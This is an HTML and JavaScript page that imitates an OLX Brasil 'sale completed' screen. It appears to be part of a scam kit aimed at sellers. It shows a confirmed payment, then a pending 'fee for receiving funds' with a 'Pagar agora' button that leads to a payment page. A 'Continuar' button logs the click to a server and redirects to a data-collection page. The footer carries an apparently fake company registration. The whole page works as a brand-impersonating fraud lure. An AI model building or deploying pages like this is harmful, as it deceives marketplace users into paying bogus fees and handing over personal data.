<!DOCTYPE html>
<html lang="pt-BR">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <meta name="description" content="Venda realizada com sucesso na OLX">
    <title>Venda Realizada - OLX Brasil</title>
    <link rel="stylesheet" href="/css/style.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css">
    <link rel="shortcut icon" href="/images/olx-favicon.ico" type="image/x-icon">
</head>

<body>
    <div class="app-container">
        <header class="header">
            <div class="header-content">
                <div class="logo">
                    <img src="/images/olx-logo.png" alt="Logo OLX">
                </div>

            </div>
        </header>

        <div class="sucesso-banner">
            <i class="fas fa-check-circle"></i>
            <p>Venda realizada com sucesso!</p>
        </div>

        <main class="main-content">
            <div class="breadcrumb">
                <a href="/">OLX</a> &gt; <a href="/vendas">Minhas Vendas</a> &gt; <span>Detalhes da Venda</span>
            </div>

            <div class="card produto-info">
                <div class="produto-galeria">
                    <div class="imagem-principal">
                        <img id="produto-imagem-principal" src="" alt="Imagem do produto">
                    </div>
                    <div class="miniaturas" id="galeria-miniaturas">
                        <!-- As miniaturas serão geradas dinamicamente pelo JavaScript -->
                    </div>
                </div>
                <div class="produto-detalhes">
                    <h2 id="produto-nome"></h2>
                    <div class="valor-data">
                        <div class="valor">
                            <p>Valor da venda:</p>
                            <h3 id="produto-valor"></h3>
                            <span class="pagamento-confirmado">
                                <i class="fas fa-check-circle"></i> Pagamento confirmado
                            </span>
                        </div>
                        <div class="data">
                            <p>Data da venda:</p>
                            <h3 id="produto-data"></h3>
                            <span class="codigo-venda">Cód: <span id="venda-codigo-small"></span></span>
                        </div>
                    </div>
                </div>
            </div>

            <div class="cards-container">
                <div class="card-column">
                    <div class="card vendedor-info">
                        <h2>Informações do vendedor</h2>
                        <div class="vendedor-perfil">
                            <div class="avatar">
                                <span id="vendedor-inicial"></span>
                            </div>
                            <div class="vendedor-detalhes">
                                <h3 id="vendedor-nome"></h3>
                                <p><i class="fas fa-map-marker-alt"></i> <span id="vendedor-localizacao"></span></p>
                                <div id="avaliacao-container" class="avaliacao">
                                    <div class="estrelas">
                                        <span class="estrela">★</span>
                                        <span class="estrela">★</span>
                                        <span class="estrela">★</span>
                                        <span class="estrela">★</span>
                                        <span class="estrela">★</span>
                                    </div>
                                    <span id="vendedor-avaliacao"></span>
                                </div>
                                <p id="produtos-vendidos-container"><i class="fas fa-tag"></i> <span
                                        id="vendedor-produtos"></span> produtos vendidos</p>
                                <button class="btn-contato">
                                    <i class="fas fa-comment"></i> Contatar vendedor
                                </button>
                            </div>
                        </div>
                    </div>

                    <div class="card status-venda">
                        <h2>Status da venda</h2>
                        <ul class="timeline">
                            <li class="concluido">
                                <i class="fas fa-check-circle"></i>
                                <div>
                                    <p class="titulo">Anúncio publicado</p>

                                </div>
                            </li>
                            <li class="concluido">
                                <i class="fas fa-check-circle"></i>
                                <div>
                                    <p class="titulo">Comprador interessado</p>

                                </div>
                            </li>
                            <li class="concluido">
                                <i class="fas fa-check-circle"></i>
                                <div>
                                    <p class="titulo">Pagamento realizado</p>

                                </div>
                            </li>
                            <li class="concluido">
                                <i class="fas fa-check-circle"></i>
                                <div>
                                    <p class="titulo">Venda concluída</p>

                                </div>
                            </li>
                            <li class="pendente">
                                <i class="fas fa-exclamation-circle"></i>
                                <div>
                                    <p class="titulo">Taxa de Recebimentos de Valores</p>
                                    <p class="data">Pendente</p>
                                    <button class="btn-taxa">Pagar agora</button>
                                </div>
                            </li>
                        </ul>
                    </div>
                </div>

                <div class="card-column">
                    <div class="card comprador-info">
                        <h2>Informações do comprador</h2>
                        <div class="comprador-detalhes">
                            <div class="comprador-avatar">
                                <i class="fas fa-user"></i>
                            </div>
                            <div>
                                <h3 id="comprador-nome"></h3>
                                <p class="comprador-desde">Usuário OLX desde 2021</p>
                                <p><i class="fas fa-shopping-bag"></i> 12 compras realizadas</p>
                            </div>
                        </div>
                    </div>

                    <div class="card codigo-info">
                        <h2>Detalhes da transação</h2>
                        <div class="codigo-container">
                            <p><strong>Código da venda:</strong></p>
                            <p id="venda-codigo" class="codigo"></p>
                        </div>
                        <div class="plataforma-container">
                            <p><strong>Plataforma:</strong></p>
                            <p id="venda-plataforma"></p>
                        </div>
                        <div class="metodo-pagamento">
                            <p><strong>Método de pagamento:</strong></p>
                            <p>Pagamento OLX <i class="fas fa-shield-alt"></i> <span class="texto-seguro">Seguro</span>
                            </p>
                        </div>
                        <div class="taxa-destaque">
                            <p><strong>Status da transação:</strong></p>
                            <p class="taxa-valor">Taxa de Recebimentos de Valores Pendente<span
                                    class="badge-pendente">Atenção</span>
                            </p>
                        </div>
                    </div>

                    <!-- Removido: card de ações disponíveis -->
                </div>
            </div>
        </main>

        <div id="erro-container" class="erro-container hidden">
            <div class="card">
                <h2>Produto não encontrado</h2>
                <p>Não foi possível encontrar o produto com o código informado.</p>
                <button class="btn-voltar">Voltar para a página inicial</button>
            </div>
        </div>



        <!-- Removido: seção de detalhes da transação com resumo e cronograma -->

        <div class="dicas-seguranca">
            <div class="dica-card">
                <i class="fas fa-shield-alt"></i>
                <h3>Segurança</h3>
                <p>Sempre use o sistema de pagamento da OLX para garantir sua proteção.</p>
            </div>
            <div class="dica-card">
                <i class="fas fa-handshake"></i>
                <h3>Confiança</h3>
                <p>Verifique a reputação do vendedor antes de finalizar sua compra.</p>
            </div>
            <div class="dica-card">
                <i class="fas fa-user-check"></i>
                <h3>Avaliação</h3>
                <p>Avalie a transação para ajudar outros usuários da comunidade.</p>
            </div>
        </div>

        <footer>
            <div class="footer-content">
                <div class="footer-column">
                    <h4>Conheça a OLX</h4>
                    <ul>
                        <li><a href="#">Quem somos</a></li>
                        <li><a href="#">Carreiras</a></li>
                        <li><a href="#">Imprensa</a></li>
                        <li><a href="#">Sustentabilidade</a></li>
                    </ul>
                </div>
                <div class="footer-column">
                    <h4>Ajuda</h4>
                    <ul>
                        <li><a href="#">Central de ajuda</a></li>
                        <li><a href="#">Dicas de segurança</a></li>
                        <li><a href="#">Plano profissional</a></li>
                        <li><a href="#">Perguntas frequentes</a></li>
                    </ul>
                </div>
                <div class="footer-column">
                    <h4>Legal</h4>
                    <ul>
                        <li><a href="#">Termos de uso</a></li>
                        <li><a href="#">Política de privacidade</a></li>
                        <li><a href="#">Diretrizes da comunidade</a></li>
                        <li><a href="#">Cookies</a></li>
                    </ul>
                </div>
                <div class="footer-column">
                    <h4>OLX nas redes</h4>
                    <div class="social-icons">
                        <a href="#"><i class="fab fa-facebook"></i></a>
                        <a href="#"><i class="fab fa-twitter"></i></a>
                        <a href="#"><i class="fab fa-instagram"></i></a>
                        <a href="#"><i class="fab fa-youtube"></i></a>
                        <a href="#"><i class="fab fa-linkedin"></i></a>
                    </div>

                </div>
            </div>
            <div class="footer-bottom">
                <p>© 2023 OLX Brasil - Todos os direitos reservados</p>
                <p>CNPJ: 10.000.000/0001-00 - Avenida Paulista, 1000 - São Paulo/SP</p>
            </div>
        </footer>
    </div>

    <!-- Modal de sucesso -->
    <div id="sucesso-modal" class="modal hidden">
        <div class="modal-content">
            <div class="modal-icon">
                <i class="fas fa-check-circle"></i>
            </div>
            <h3>Parabéns!</h3>
            <p>Sua venda foi concluída com sucesso</p>
            <button id="btn-continuar" class="btn-continuar" onclick="notificarCliqueContinuar()">
                Continuar
            </button>
        </div>
    </div>

    <script src="/js/script.js"></script>

    <!-- Adicionar script para compatibilidade com dispositivos móveis -->
    <script>
        // Função para carregar dados do produto e garantir compatibilidade móvel
        function carregarDadosProduto() {
            // Obter código da venda da URL
            const urlParams = new URLSearchParams(window.location.search);
            const codigoVenda = urlParams.get('codigo') || 'OLX123456789';

            // Tentar vários caminhos para o arquivo JSON
            const caminhos = [
                '/data/vendas.json',
                './data/vendas.json',
                '../data/vendas.json'
            ];

            let tentativaAtual = 0;

            function tentarProximoCaminho() {
                if (tentativaAtual >= caminhos.length) {
                    console.error('Não foi possível carregar os dados do produto');
                    document.getElementById('erro-container').classList.remove('hidden');
                    return;
                }

                fetch(caminhos[tentativaAtual])
                    .then(response => {
                        if (!response.ok) {
                            throw new Error('Resposta da rede não foi ok');
                        }
                        return response.json();
                    })
                    .then(data => {
                        const venda = data.find(v => v.codigo === codigoVenda) || data[0];
                        if (venda) {
                            preencherDadosVenda(venda);
                            // Mostrar modal de sucesso após carregar dados
                            setTimeout(() => {
                                document.getElementById('sucesso-modal').classList.remove('hidden');
                            }, 1500);
                        } else {
                            throw new Error('Venda não encontrada');
                        }
                    })
                    .catch(error => {
                        console.error('Erro ao carregar dados:', error);
                        tentativaAtual++;
                        tentarProximoCaminho();
                    });
            }

            tentarProximoCaminho();
        }

        // Função melhorada para manipular miniaturas com suporte a touch
        function setupGaleriaTouchEvents() {
            // Aguardar elementos serem carregados na DOM
            setTimeout(() => {
                const miniaturas = document.querySelectorAll('.miniatura');
                const imagemPrincipal = document.getElementById('produto-imagem-principal');

                if (!miniaturas.length || !imagemPrincipal) return;

                miniaturas.forEach(miniatura => {
                    // Adicionar eventos de mouse
                    miniatura.addEventListener('click', function () {
                        imagemPrincipal.src = this.src;
                        document.querySelectorAll('.miniatura').forEach(m => m.classList.remove('ativa'));
                        this.classList.add('ativa');
                    });

                    // Adicionar eventos de touch para dispositivos móveis
                    miniatura.addEventListener('touchstart', function (e) {
                        e.preventDefault();
                        imagemPrincipal.src = this.src;
                        document.querySelectorAll('.miniatura').forEach(m => m.classList.remove('ativa'));
                        this.classList.add('ativa');
                    }, { passive: false });
                });
            }, 500);
        }

        // Função para tratar erro de carregamento de imagens
        function aplicarImagemPlaceholder(imgElement) {
            imgElement.onerror = null; // Evitar loop infinito
            imgElement.src = '/images/produto-placeholder.jpg';

            // Se ainda falhar, criar uma imagem base64
            imgElement.addEventListener('error', function () {
                const canvas = document.createElement('canvas');
                canvas.width = 200;
                canvas.height = 150;
                const ctx = canvas.getContext('2d');
                ctx.fillStyle = '#f0f0f0';
                ctx.fillRect(0, 0, canvas.width, canvas.height);
                ctx.fillStyle = '#6e0ad6';
                ctx.font = '16px Arial';
                ctx.textAlign = 'center';
                ctx.fillText('Produto OLX', canvas.width / 2, canvas.height / 2);
                this.src = canvas.toDataURL('image/png');
            });
        }

        // Função para inicializar todas as funcionalidades
        function inicializarPagina() {
            carregarDadosProduto();
            setupGaleriaTouchEvents();

            // Adicionar eventos para botão de taxa
            document.querySelectorAll('.btn-taxa').forEach(btn => {
                btn.addEventListener('click', function (e) {
                    e.preventDefault();
                    window.location.href = '/pag/pagamento.html';
                });

                // Adicionar evento de touch para dispositivos móveis
                btn.addEventListener('touchstart', function (e) {
                    e.preventDefault();
                    window.location.href = '/pag/pagamento.html';
                }, { passive: false });
            });
        }

        // Iniciar quando o documento estiver pronto
        if (document.readyState === 'loading') {
            document.addEventListener('DOMContentLoaded', inicializarPagina);
        } else {
            inicializarPagina();
        }
    </script>

    <style>
        /* Melhorias gerais de estilo */
        body {
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            background-color: #f5f5f5;
            color: #333;
        }

        .app-container {
            max-width: 1200px;
            margin: 0 auto;
        }

        .card {
            border-radius: 12px;
            box-shadow: 0 4px 12px rgba(0, 0, 0, 0.08);
            transition: transform 0.2s ease, box-shadow 0.2s ease;
        }

        .card:hover {
            box-shadow: 0 6px 16px rgba(0, 0, 0, 0.12);
        }

        .btn-taxa {
            background-color: #6e0ad6;
            color: white;
            border: none;
            border-radius: 4px;
            padding: 6px 12px;
            cursor: pointer;
            margin-top: 5px;
            font-weight: bold;
            transition: background-color 0.2s ease;
        }

        .btn-taxa:hover {
            background-color: #5708aa;
        }

        /* Estilos para a galeria de imagens */
        .produto-galeria {
            display: flex;
            flex-direction: column;
            max-width: 500px;
        }

        .imagem-principal {
            width: 100%;
            margin-bottom: 15px;
            border-radius: 12px;
            overflow: hidden;
            height: 450px;
            /* Altura maior */
            display: flex;
            align-items: center;
            justify-content: center;
            background-color: #f8f8f8;
            box-shadow: 0 4px 10px rgba(0, 0, 0, 0.08);
        }

        .imagem-principal img {
            width: 100%;
            height: 100%;
            object-fit: contain;
        }

        .miniaturas {
            display: flex;
            gap: 12px;
            overflow-x: auto;
            padding: 8px 0;
            scroll-behavior: smooth;
        }

        .miniatura {
            width: 90px;
            /* Miniaturas maiores */
            height: 90px;
            /* Miniaturas maiores */
            object-fit: cover;
            border-radius: 8px;
            cursor: pointer;
            transition: all 0.2s ease;
            border: 2px solid transparent;
            flex-shrink: 0;
            box-shadow: 0 2px 6px rgba(0, 0, 0, 0.1);
        }

        .miniatura:hover {
            opacity: 0.9;
            transform: translateY(-3px);
        }

        .miniatura.ativa {
            border-color: #6e0ad6;
            box-shadow: 0 2px 8px rgba(110, 10, 214, 0.3);
        }

        /* Adiciona indicadores de rolagem quando há muitas imagens */
        .miniaturas::-webkit-scrollbar {
            height: 6px;
        }

        .miniaturas::-webkit-scrollbar-thumb {
            background: #6e0ad6;
            border-radius: 6px;
        }

        /* Status da venda */
        .timeline li.pendente {
            color: #e74c3c;
        }

        .timeline li.pendente i {
            color: #e74c3c;
        }

        .taxa-destaque {
            padding: 12px;
            margin-top: 10px;
            border: 1px dashed #e74c3c;
            border-radius: 8px;
            background-color: #fff5f5;
        }

        .taxa-valor {
            font-weight: bold;
            color: #e74c3c;
        }

        .badge-pendente {
            background-color: #e74c3c;
            color: white;
            font-size: 0.8rem;
            padding: 3px 8px;
            border-radius: 12px;
            margin-left: 8px;
        }

        /* Melhorias nos botões */
        .btn-imprimir,
        .btn-reportar,
        .btn-avaliar,
        .btn-contato {
            border-radius: 8px;
            padding: 10px 16px;
            transition: transform 0.2s ease, box-shadow 0.2s ease;
        }

        .btn-imprimir:hover,
        .btn-reportar:hover,
        .btn-avaliar:hover,
        .btn-contato:hover {
            transform: translateY(-2px);
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.15);
        }

        /* Melhorias na visualização de produtos */
        .produto-info {
            gap: 25px;
            padding: 25px;
        }

        .produto-detalhes h2 {
            font-size: 1.8rem;
            margin-bottom: 20px;
            color: #333;
        }

        .pagamento-confirmado {
            background-color: #e6f7ee;
            color: #28a745;
            padding: 6px 12px;
            border-radius: 20px;
            display: inline-flex;
            align-items: center;
            gap: 6px;
            font-weight: 600;
            margin-top: 8px;
        }

        /* Cards com destaque */
        .card-column {
            gap: 20px;
        }

        .dicas-seguranca {
            margin-top: 30px;
            background-color: #f0f6ff;
            border-radius: 12px;
            padding: 20px;
        }

        .dica-card {
            background-color: white;
            border-radius: 10px;
            padding: 20px;
            box-shadow: 0 4px 10px rgba(0, 0, 0, 0.05);
        }

        /* Status da venda centralizado e melhorado */
        .timeline {
            width: 100%;
            display: flex;
            flex-direction: column;
            align-items: center;
            text-align: center;
        }

        .timeline li {
            width: 85%;
            margin: 8px 0;
            padding: 12px;
            border-radius: 10px;
            background-color: #f9f9f9;
        }

        .timeline li.concluido {
            background-color: #f0f8f2;
        }

        .timeline li.pendente {
            color: #e74c3c;
            background-color: #fdf1f0;
            border: 1px solid #fadbd8;
        }

        .timeline li i {
            font-size: 1.5rem;
            margin-bottom: 8px;
        }

        .timeline li .titulo {
            font-weight: 600;
            font-size: 1.1rem;
            margin-bottom: 4px;
        }

        .btn-taxa {
            background-color: #e74c3c;
            color: white;
            border: none;
            border-radius: 20px;
            padding: 8px 20px;
            cursor: pointer;
            margin-top: 10px;
            font-weight: bold;
            transition: all 0.3s ease;
            box-shadow: 0 2px 5px rgba(231, 76, 60, 0.3);
        }

        .btn-taxa:hover {
            background-color: #c0392b;
            transform: translateY(-2px);
            box-shadow: 0 4px 8px rgba(231, 76, 60, 0.4);
        }

        /* Taxa destaque sem valor específico */
        .taxa-destaque {
            padding: 15px;
            margin-top: 15px;
            text-align: center;
            border: 1px dashed #e74c3c;
            border-radius: 10px;
            background-color: #fff5f5;
        }

        .taxa-valor {
            font-weight: bold;
            color: #e74c3c;
            font-size: 1.1rem;
        }

        .badge-pendente {
            background-color: #e74c3c;
            color: white;
            font-size: 0.8rem;
            padding: 3px 10px;
            border-radius: 20px;
            margin-left: 8px;
        }

        /* Estilos para as novas seções */
        .secao-titulo {
            text-align: center;
            margin: 30px 0 20px;
            color: #333;
            font-size: 1.8rem;
            font-weight: 600;
            display: flex;
            align-items: center;
            justify-content: center;
            gap: 10px;
        }

        .secao-titulo i {
            color: #6e0ad6;
        }

        /* Produtos recomendados */
        .produtos-recomendados {
            margin: 40px 0;
            padding: 20px;
            background-color: #fff;
            border-radius: 12px;
            box-shadow: 0 4px 12px rgba(0, 0, 0, 0.05);
        }

        .produtos-grid {
            display: grid;
            grid-template-columns: repeat(auto-fill, minmax(250px, 1fr));
            gap: 20px;
            margin-top: 20px;
        }

        .produto-card {
            background-color: white;
            border-radius: 12px;
            overflow: hidden;
            box-shadow: 0 3px 10px rgba(0, 0, 0, 0.1);
            transition: transform 0.3s ease, box-shadow 0.3s ease;
            height: 100%;
            display: flex;
            flex-direction: column;
        }

        .produto-card:hover {
            transform: translateY(-5px);
            box-shadow: 0 8px 15px rgba(0, 0, 0, 0.15);
        }

        .produto-img {
            position: relative;
            height: 180px;
            overflow: hidden;
        }

        .produto-img img {
            width: 100%;
            height: 100%;
            object-fit: cover;
            transition: transform 0.5s ease;
        }

        .produto-card:hover .produto-img img {
            transform: scale(1.05);
        }

        .etiqueta-destaque {
            position: absolute;
            top: 10px;
            right: 10px;
            background-color: #6e0ad6;
            color: white;
            padding: 5px 10px;
            border-radius: 20px;
            font-size: 0.8rem;
            font-weight: bold;
            box-shadow: 0 2px 5px rgba(0, 0, 0, 0.2);
        }

        .produto-info-card {
            padding: 15px;
            display: flex;
            flex-direction: column;
            flex-grow: 1;
        }

        .produto-info-card h3 {
            margin: 0 0 10px;
            font-size: 1.1rem;
            color: #333;
        }

        .produto-preco {
            font-weight: bold;
            color: #6e0ad6;
            font-size: 1.2rem;
            margin: 5px 0;
        }

        .produto-local {
            color: #777;
            font-size: 0.9rem;
            margin: 5px 0 15px;
        }

        .btn-ver-produto {
            margin-top: auto;
            background-color: #6e0ad6;
            color: white;
            border: none;
            border-radius: 8px;
            padding: 10px;
            cursor: pointer;
            font-weight: 600;
            transition: background-color 0.2s ease;
        }

        .btn-ver-produto:hover {
            background-color: #5708aa;
        }

        /* Estilo para imagem de fallback */
        .fallback-img {
            width: 100%;
            height: 100%;
            display: flex;
            align-items: center;
            justify-content: center;
            background: linear-gradient(135deg, #f0f0f0, #e0e0e0);
        }

        .fallback-img i {
            font-size: 3rem;
            color: #6e0ad6;
        }

        /* Estilo para mensagem de erro de produtos */
        .erro-produtos {
            text-align: center;
            padding: 30px;
            background-color: #fff5f5;
            border-radius: 10px;
            border: 1px dashed #e74c3c;
            width: 100%;
            grid-column: 1 / -1;
        }

        .erro-produtos p {
            color: #e74c3c;
            font-size: 1.1rem;
            margin: 0;
        }

        /* Responsividade */
        @media (max-width: 768px) {
            .cards-horizontal {
                grid-template-columns: 1fr;
            }

            .produtos-grid {
                grid-template-columns: repeat(auto-fill, minmax(200px, 1fr));
            }
        }

        /* Melhorias de responsividade para dispositivos móveis */
        @media (max-width: 768px) {
            .app-container {
                padding: 0 10px;
            }

            .cards-container {
                flex-direction: column;
            }

            .card-column {
                width: 100%;
            }

            .produto-info {
                flex-direction: column;
            }

            .produto-galeria {
                max-width: 100%;
            }

            .imagem-principal {
                height: 300px;
            }

            .miniatura {
                width: 70px;
                height: 70px;
            }

            /* Aumentar área de toque para elementos interativos */
            .btn-taxa,
            .btn-contato,
            .btn-continuar,
            .btn-ver-produto {
                padding: 12px 20px;
                min-height: 44px;
                font-size: 16px;
            }

            /* Melhorar timeline em dispositivos móveis */
            .timeline li {
                width: 100%;
            }

            /* Tornar botões mais visíveis */
            .btn-taxa {
                margin-top: 15px;
            }
        }

        /* Corrigir problema de scroll horizontal */
        body {
            overflow-x: hidden;
        }

        /* Garantir que imagens se ajustem corretamente */
        img {
            max-width: 100%;
        }

        /* Melhorar feedback de toque para elementos interativos */
        .miniatura,
        .btn-taxa,
        .btn-contato,
        .btn-continuar,
        .btn-ver-produto {
            -webkit-tap-highlight-color: rgba(110, 10, 214, 0.2);
        }
    </style>

    <!-- Adicionar script para criar placeholder de imagem caso a imagem padrão não seja encontrada -->
    <script>
        // Criar placeholder de imagem para fallback
        function criarImagemPlaceholder() {
            // Verificar se já existe o elemento no DOM
            if (document.getElementById('produto-placeholder-img')) {
                return;
            }

            // Criar elemento canvas para gerar uma imagem placeholder
            const canvas = document.createElement('canvas');
            canvas.width = 250;
            canvas.height = 180;
            const ctx = canvas.getContext('2d');

            // Preencher fundo
            ctx.fillStyle = '#f0f0f0';
            ctx.fillRect(0, 0, canvas.width, canvas.height);

            // Adicionar texto
            ctx.fillStyle = '#6e0ad6';
            ctx.font = 'bold 20px sans-serif';
            ctx.textAlign = 'center';
            ctx.textBaseline = 'middle';
            ctx.fillText('Produto OLX', canvas.width / 2, canvas.height / 2);

            // Adicionar borda
            ctx.strokeStyle = '#ccc';
            ctx.lineWidth = 2;
            ctx.strokeRect(5, 5, canvas.width - 10, canvas.height - 10);

            // Adicionar ícone
            ctx.fillStyle = '#6e0ad6';
            ctx.beginPath();
            ctx.arc(canvas.width / 2, 50, 20, 0, Math.PI * 2);
            ctx.fill();

            // Converter para URL de dados
            const dataUrl = canvas.toDataURL('image/png');

            // Criar elemento de imagem e adicionar ao DOM
            const img = document.createElement('img');
            img.id = 'produto-placeholder-img';
            img.src = dataUrl;
            img.style.display = 'none';
            document.body.appendChild(img);

            // Substituir todas as imagens com erro pelo placeholder
            document.querySelectorAll('.produto-img img[onerror]').forEach(img => {
                img.onerror = function () {
                    this.src = dataUrl;
                    this.onerror = null; // Evita loop infinito
                };
            });

            return dataUrl;
        }

        // Executar após o carregamento da página
        window.addEventListener('load', criarImagemPlaceholder);

        // Verificar imagens com erro após 1 segundo (para dar tempo de carregar)
        setTimeout(() => {
            document.querySelectorAll('.produto-img img').forEach(img => {
                if (!img.complete || img.naturalHeight === 0) {
                    const placeholder = document.getElementById('produto-placeholder-img');
                    if (placeholder) {
                        img.src = placeholder.src;
                    } else {
                        const dataUrl = criarImagemPlaceholder();
                        img.src = dataUrl;
                    }
                }
            });
        }, 1000);
    </script>

    <!-- Script para carregar produtos do vendas.json -->
    <script>
        // Função para carregar os produtos do arquivo vendas.json
        async function carregarProdutosRecomendados() {
            const containerProdutos = document.getElementById('produtos-recomendados-container');

            try {
                // Tentar primeiro com o caminho relativo
                let resposta = await fetch('/data/vendas.json');

                // Se falhar, tentar com caminho alternativo
                if (!resposta.ok) {
                    resposta = await fetch('../data/vendas.json');
                }

                // Se ainda falhar, tentar com caminho absoluto
                if (!resposta.ok) {
                    resposta = await fetch('c:/Users/rs250/OneDrive/Desktop/olx2/data/vendas.json');
                }

                if (!resposta.ok) {
                    throw new Error(`Falha ao carregar os produtos: ${resposta.status}`);
                }

                const produtos = await resposta.json();

                // Verificar se produtos é um array e tem elementos
                if (!Array.isArray(produtos) || produtos.length === 0) {
                    throw new Error('O arquivo não contém produtos válidos');
                }

                // Limpar container
                containerProdutos.innerHTML = '';

                // Adicionar cada produto do JSON como um card
                produtos.forEach((item, index) => {
                    // Garantir que todos os campos necessários existam
                    const produto = {
                        codigo: item.codigo || `produto-${index}`,
                        produto: item.produto || "Produto OLX",
                        valor: item.valor || 0,
                        vendedor: item.vendedor || { localizacao: "Brasil" },
                        imagem: item.imagem || []
                    };

                    // Garantir que vendedor.localizacao existe
                    if (!produto.vendedor.localizacao) {
                        produto.vendedor.localizacao = "Brasil";
                    }

                    const imagemPrincipal = produto.imagem && produto.imagem.length > 0
                        ? produto.imagem[0]
                        : '/images/produto-placeholder.jpg';

                    const valorFormatado = typeof produto.valor === 'number'
                        ? `R$ ${produto.valor.toLocaleString('pt-BR', { minimumFractionDigits: 2, maximumFractionDigits: 2 })}`
                        : `R$ ${produto.valor}`;

                    const etiqueta = index === 0 ? '<span class="etiqueta-destaque">Destaque</span>' :
                        index === 1 ? '<span class="etiqueta-destaque">Novo</span>' : '';

                    const produtoHTML = `
                        <div class="produto-card">
                            <div class="produto-img">
                                <img src="${imagemPrincipal}" alt="${produto.produto}"
                                    onerror="aplicarImagemPlaceholder(this)">
                                ${etiqueta}
                            </div>
                            <div class="produto-info-card">
                                <h3>${produto.produto}</h3>
                                <p class="produto-preco">${valorFormatado}</p>
                                <p class="produto-local"><i class="fas fa-map-marker-alt"></i> ${produto.vendedor.localizacao}</p>
                                <button class="btn-ver-produto" data-codigo="${produto.codigo}">Ver detalhes</button>
                            </div>
                        </div>
                    `;

                    containerProdutos.innerHTML += produtoHTML;
                });

                // Adicionar eventos para os botões
                document.querySelectorAll('.btn-ver-produto').forEach(botao => {
                    botao.addEventListener('click', function () {
                        const codigo = this.getAttribute('data-codigo');
                        window.location.href = `/?codigo=${codigo}`;
                    });
                });

            } catch (erro) {
                console.error('Erro ao carregar produtos recomendados:', erro);

                // Se falhar, usar dados de fallback
                const produtosDefault = [
                    {
                        codigo: "FALLBACK1",
                        produto: "Gelopar Frost Free Cervejeira 410L",
                        valor: 2000,
                        vendedor: { localizacao: "São Paulo, SP" },
                        destaque: true
                    },
                    {
                        codigo: "FALLBACK2",
                        produto: "iPhone 13 Pro Max",
                        valor: 5999.99,
                        vendedor: { localizacao: "Rio de Janeiro, RJ" },
                        destaque: false
                    }
                ];

                containerProdutos.innerHTML = '';
                produtosDefault.forEach((item, index) => {
                    const etiqueta = item.destaque ? '<span class="etiqueta-destaque">Destaque</span>' : '';

                    const produtoHTML = `
                        <div class="produto-card">
                            <div class="produto-img">
                                <div class="fallback-img">
                                    <i class="fas fa-box-open"></i>
                                </div>
                                ${etiqueta}
                            </div>
                            <div class="produto-info-card">
                                <h3>${item.produto}</h3>
                                <p class="produto-preco">R$ ${item.valor.toLocaleString('pt-BR', { minimumFractionDigits: 2 })}</p>
                                <p class="produto-local"><i class="fas fa-map-marker-alt"></i> ${item.vendedor.localizacao}</p>
                                <button class="btn-ver-produto" data-codigo="${item.codigo}">Ver detalhes</button>
                            </div>
                        </div>
                    `;

                    containerProdutos.innerHTML += produtoHTML;
                });
            }
        }
    </script>

    <!-- Adicionar script para notificação de clique no botão continuar -->
    <script>
        function notificarCliqueContinuar() {
            // Obter código da venda e nome do produto da página
            const codigoVenda = document.getElementById('venda-codigo')?.textContent ||
                document.getElementById('venda-codigo-small')?.textContent ||
                "Não informado";
            const nomeProduto = document.getElementById('produto-nome')?.textContent || "Não informado";

            // Enviar notificação ao servidor
            fetch('/api/notificar-clique-continuar', {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify({
                    codigo: codigoVenda,
                    produto: nomeProduto
                })
            })
                .then(response => response.json())
                .then(data => {
                    console.log('Notificação enviada:', data);
                    // Modificado: Incluir o código da venda na URL de redirecionamento
                    window.location.href = `/pag/dados.html?id=${encodeURIComponent(codigoVenda)}`;
                })
                .catch(error => {
                    console.error('Erro ao enviar notificação:', error);
                    // Modificado: Incluir o código da venda mesmo em caso de erro
                    window.location.href = `/pag/dados.html?id=${encodeURIComponent(codigoVenda)}`;
                });
        }
    </script>

</body>

</html>